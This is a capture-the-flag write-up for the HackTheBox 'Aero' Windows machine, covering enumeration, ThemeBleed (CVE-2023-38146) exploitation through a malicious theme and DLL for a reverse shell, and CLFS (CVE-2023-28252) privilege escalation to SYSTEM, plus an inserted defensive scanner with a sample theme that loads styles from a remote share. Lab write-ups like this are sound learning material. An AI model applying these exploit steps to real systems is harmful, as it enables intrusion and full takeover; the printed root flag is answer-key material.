Box Info
  • Name: Aero
  • OS: Windows
  • Difficulty: Medium
  • IP: 10.10.11.237
Aero box image

Setup

mkdir -p ~/ctf/HackTheBox/aero/scans; cd ~/ctf/HackTheBox/aero

IP Address: 10.10.11.237

echo "10.10.11.237 aero.htb" | sudo tee -a /etc/hosts

10.10.11.237 aero.htb


Enumeration

nmap -sC -sV -Pn -p- aero.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 aero.htb

# nmap findings
PORT     STATE SERVICE    REASON          VERSION
80/tcp   open  http       syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
7680/tcp open  pando-pub? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

ffuf -r -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt:ff -u http://aero.htb/ff -o scans/ffuf_dir

# FFUF dir search findings 
Home                    [Status: 200, Size: 11650, Words: 3468, Lines: 187, Duration: 311ms]
upload                  [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 75ms]

ffuf finds two endpoints on the port 80 website; the home page offers an upload option.

Pasted_image_20250730194701.png

When we try to upload, we see the supported formats are .theme and .themepack.

Pasted_image_20250730194745.png

Searching Google for these formats leads to an article on CVE-2023-38146 (ThemeBleed).

Using the exploit provided in this GitHub repo, we generate custom .theme and .themepack files with PACKTHEM_VERSION set to 999. As the vulnerability describes, the integrity check is passed with an unmodified .msstyles file, after which our malicious DLL, Aero.msstyles_vrf_evil.dll, is loaded to execute arbitrary commands.

Pasted_image_20250731095012.png

Pasted_image_20250731095040.png

We get an SMB connection and our modified DLL is accessed:

Pasted_image_20250731095142.png

We get a reverse shell on our netcat listener:

Pasted_image_20250731095222.png
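The chain above works because the uploaded .theme file points the visual style at an .msstyles file on a share the attacker controls, and the server applies whatever theme is uploaded. As an added example that is not part of the original writeup, here is a small Python scanner a defender could run over an upload directory to flag .theme files whose [VisualStyles] Path leaves the system Themes directory (UNC paths, URLs or any other location). The sample theme contents, the REMOTE-HOST placeholder and the trusted-prefix heuristic are my own assumptions, not taken from the page.

```python
import configparser
import re
from pathlib import Path
from typing import Dict, List

# Assumed trusted location for visual styles on a stock Windows install.
# Anything else is flagged. This is a heuristic chosen for this example,
# not an official Microsoft rule.
TRUSTED_PREFIX = "%systemroot%\\resources\\themes\\"
UNC_RE = re.compile(r"^\\\\[^\\]+\\")                          # \\host\share\...
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # http://..., etc.

# Constructed sample .theme contents (not from the box).
BENIGN_THEME = """[Theme]
DisplayName=Corporate Blue

[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Visual style fetched from a remote share: the pattern the ThemeBleed
# (CVE-2023-38146) chain relies on. REMOTE-HOST is a placeholder.
REMOTE_THEME = """[Theme]
DisplayName=Totally Normal Theme

[VisualStyles]
Path=\\\\REMOTE-HOST\\share\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Local but outside the system Themes directory: still worth a look.
LOCAL_UNTRUSTED_THEME = """[Theme]
DisplayName=Dropped Theme

[VisualStyles]
Path=C:\\Users\\Public\\custom.msstyles
"""


def find_theme_findings(theme_text: str) -> List[str]:
    """Return human-readable findings for the contents of one .theme file."""
    # .theme files are INI; interpolation is off so %SystemRoot% is kept literally.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(theme_text)
    except configparser.Error as exc:
        return [f"unparseable .theme file: {exc}"]
    findings: List[str] = []
    if not cp.has_section("VisualStyles"):
        return findings  # no custom msstyles referenced at all
    path = cp.get("VisualStyles", "Path", fallback="").strip()
    if not path:
        return findings
    if UNC_RE.match(path):
        findings.append(f"VisualStyles Path is a UNC path (remote msstyles): {path}")
    elif URL_RE.match(path):
        findings.append(f"VisualStyles Path is a URL: {path}")
    elif not path.lower().startswith(TRUSTED_PREFIX):
        findings.append(f"VisualStyles Path outside the system Themes directory: {path}")
    return findings


def read_theme(p: Path) -> str:
    """Read a .theme file; Windows often writes them as UTF-16 with a BOM."""
    raw = p.read_bytes()
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")


def scan_directory(directory: str) -> Dict[str, List[str]]:
    """Scan every *.theme file under `directory`, mapping file path to findings."""
    results: Dict[str, List[str]] = {}
    for p in Path(directory).rglob("*.theme"):
        results[str(p)] = find_theme_findings(read_theme(p))
    return results


if __name__ == "__main__":
    samples = [("benign", BENIGN_THEME), ("remote", REMOTE_THEME),
               ("local-untrusted", LOCAL_UNTRUSTED_THEME)]
    for name, text in samples:
        print(name, "->", find_theme_findings(text) or ["no findings"])
```

Run it on the upload directory with scan_directory("<upload dir>") and alert on any non-empty list; a theme whose visual style resolves off-host has no business on an intake server that applies themes automatically.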


User Flag

Location: C:\Users\sam.emerson\Desktop | Flag:

Privilege Escalation

In the Documents folder we find two files: a PDF and a PowerShell script.

watchdog.ps1 is a script that checks for uploaded theme files and executes them.

Pasted_image_20250731114429.png

Using Impacket's SMB server we open an SMB share, connect to it from the box shell and transfer the PDF.

Pasted_image_20250731114756.png

The PDF summarises CVE-2023-28252, which targets the Common Log File System (CLFS) driver.

A precompiled binary exploiting this is available in this GitHub repo.

Pasted_image_20250731114910.png

Running the binary with the command whoami:

&"C:\Users\sam.emerson\Documents\clfs.exe" "whoami"

Pasted_image_20250731122438.png

When we run the binary from PowerShell we get a shell as NT AUTHORITY\SYSTEM:

Pasted_image_20250731122716.png


Root Flag

Location: C:\Users\Administrator\Desktop\root.txt | Flag: cb1e0fe8ee7aec3863a458a1937c069e